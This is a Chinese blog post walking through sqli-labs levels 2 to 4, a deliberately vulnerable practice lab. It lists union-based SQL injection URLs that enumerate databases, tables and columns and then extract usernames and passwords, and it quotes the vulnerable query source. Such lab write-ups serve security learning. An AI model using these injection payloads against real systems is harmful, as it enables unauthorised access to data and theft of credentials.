sqli2 2到4关

已于 2022-07-06 15:02:22 修改
阅读量180 收藏 1
点赞数
文章标签: 数据库 sql java
于 2022-07-06 14:49:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69349614/article/details/125639546
版权

Less-2

报错注入测试注入点:/Less-2/?id=1' (只要能让sql报错就行)

发现有LIMIT 0,1,即说明只有一个输出,下面判断要把id项设置为0或不存在,避免占用输出

/Less-2/?id=-1 or 1=1       //有输出
 /Less-2/?id=-1 or 1=2       //无输出
 判断可以正确执行sql代码
 
 判断列数:/Less-2/?id=1 order by 3#  超过3会报错,判断为3列
 测试输出点:/Less-2/?id=-1 union select 1,2,3 --+


爆当前数据库:/Less-2/?id=-1 union select 1,database(),3 --+
 
 爆所有数据库库名:/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+


爆表名:/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+


爆列名:/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and  table_name='users'--+


查数据:/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+


//源码
 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
 $result=mysql_query($sql);

Less-3

单引号报错,双引号返回正常,那么我们看报错信息,如下图:

报错信息显示在 ''1'') LIMIT 0,1' 处有语法错误,可以看到参数还被一个括号包裹,那么我们闭合就好,然后直接爆数据,payload如下:

闭合:http://192.168.237.1/sqli-labs/Less-3/?id=1')--+
数据库名:http://192.168.237.1/sqli-labs/Less-3/?id=-1') union select 1,database(),3--+
表名:http://192.168.237.1/sqli-labs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
字段名:http://192.168.237.1/sqli-labs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'--+
username/password值:http://192.168.237.1/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username/password),3 from security.users--+

Less-4

单引号不报错,双引号报错,看报错信息,如下图:

报错信息显示在'"1"") LIMIT 0,1'处,有语法错误,可以看到参数被一个括号包裹,和上一题是一样的,只是单引号换成了双引号,我们同样闭合就好:

http://192.168.237.1/sqli-labs/Less-4/?id=1")--+

然后直接爆数据,payload参照上面一题,把单引号换成双引号就可以。

m0_69349614
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli - labs - 2
m0_62102000的博客
06-30 171
Less-2GET-Error based- Intiger based
sqli靶场1,2,3秘籍详解
agrilly的博客
06-15 216
sqli靶场1,2,3秘籍详解
SQL注入 Less23(过滤注释符)
开心星人的博客
07-24 1550
先去掉左右两边各一个单引号,相当于语文中的引用。因为过滤了注释符,我们可以手动闭合后面的单引号。尝试使用union注入,因为是有回显点的。想使用报错注入的,因为是会有报错信息的。直接使用union,来逐个测试字段数。很明显知道是单引号闭合。这部分,导致语句出错了。...
sqllab 第二
aliexiansheng的博客
10-22 302
一、判断注入 报错与第一报错有区别,少了几个字符。 第一: ‘1’’ LIMIT 0,1 第二:’ – LIMIT 0,1 没有提示闭合错误,再根据第二的题目为整数型注入,所以换种方法。 http://127.0.0.1/sqllab/Less-2/?id=1 and 1=1 --+ //图一,正常显示 http://127.0.0.1/sqllab/Less-2/?id=1 and 1=2 --+ //图二,显示异常 图一: 图二: 证明参数id存在注入点。 二、判断列数以及回显位置 h
sql整数型注入-sqli第2
weixin_46784800的博客
11-04 211
第二注入语法 http://sqli/less-1/?id=0 union select 111,222,database() -- - 爆当前使用的数据库名 http://sqli/less-1/?id=0 union select 111,222,group_concat(table_name) from information_schema.tables where table_schema = 'security' -- - 爆数据库的表名 http://sqli/less-1/?id=
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
《Beyond_SQLi_Obfuscate_and_Bypass》.pdf
11-28
总的来说,《Beyond SQLi: Obfuscate and Bypass》是一篇深入解析SQL注入攻击策略的宝贵资源,它揭示了攻击者如何巧妙地规避安全措施,并为防御者提供了对抗这些攻击的思路和实践建议。对于网络安全专业人士来说,...
sqldd:一款碾压sqlmap的sql注入漏洞检测系统^^
05-31
图4-6 程序总体流程图图 SQLDD运行界面测试环境搭建测试网站:本地搭建Sqli-lib环境。如图4-1所示。Sqli-lib是一款由PHP语言编写SQL注入漏洞闯游戏,包含了六十几个可注入页面,涵盖了几乎所有类型SQL注入漏洞,...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的...同时,我们应当意识到,安全防护不仅仅是技术问题,合理的编程习惯和充分的输入验证也是防止SQL注入的键。
web-其他注入和二次注入
07-15
首先,我们来看Sqli-lab24中的“二次注入”。二次注入(Second-order Injection)是指恶意数据被存储在数据库中,然后在稍后的查询中被重新使用,从而触发注入攻击。在例子中,攻击者尝试更新用户密码的SQL语句...
sqli-labs(2)
jimggg的博客
03-17 301
一上来一顿单引号,双引号,单括号,双括号or and测试,都不行,拿sqlmap跑一下子 唉,大意了不是,最简单的数字型注入,开整 http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3–+ 正常显示,列查询3,接着暴库,这题我就不上这么多图了,偷懒!!! http://192.168.1.21/sqli-labs...
sqli-labs第2
weixin_45626840的博客
04-23 208
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 528
sqli-labs注入之2至4
qq_51954912的博客
03-13 186
前言:此部分主要记录sqli-labs闯2-4,其中我觉得最重要的如何判断闭合符号 sqli-labs注入二至四第二第三第四 第二 首先判断是整形注入还是字符型注入 由上图可知为数值型注入,即不需任何闭合符号。 判断列数 可知列数为3 判断显示位 爆出数据库数据库得出表名 ?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=
Sqli-Labs之less-2
ISNS的博客
02-05 961
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sqli labs 2
yy2013
10-11 219
sqli labs 2 的一些答案解析题11: 查看页面首先这是一道post注入题目的练习 username=admin’ password=1 报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
sqli2 第一
m0_69349614的博客
07-05 109
根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果:可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己构造的sql语句实施攻击。我们按照步骤来,一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。例如: sel
sqli-labs系列——第二
1匹黑马
04-26 4037
文章目录判断注入类型开始注入 判断注入类型 1' and '1'='1 //错误 1 and 1=1 //正常 所以是数字型注入,所以不需要单引号来闭合前边的参数,但是要用-把参数注释掉,让Mysql执行我们后边的exp 开始注入 这里就不一一去爆了,跟第一的流程是一样的,直接上exp干了: http://192.168.1.113:86/Less-2/?id=-1 union SELE...
sqli-less2-4(union注入)
01mx的博客
03-19 208
less2(数字型) 一、判断注入类型 输入: ?id=1 and 1=1–+ 看回显 回显正常 输入:?id=1 and 1=2–+ 回显错误 判断是sql注入是~数字型 二、进行注入 输入:?id=1 order by 3–+ 显示正常 输入:?id=1 order by 4–+ 显示错误 判断有3列 三、union注入 输入:?id=-1 union select 1,2,3–+ 输入:?id=-1 union select 1,(select group_concat(table_name)
sqli-labs第4
09-20
sqli-labs第4的目标是获取数据库表中的数据。该卡可以通过以下步骤完成: 1. 首先,你需要找到有表名和列名的信息。你可以使用注入语句"?id=-1") union select 1,2,group_concat(hex(column_name)) from ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值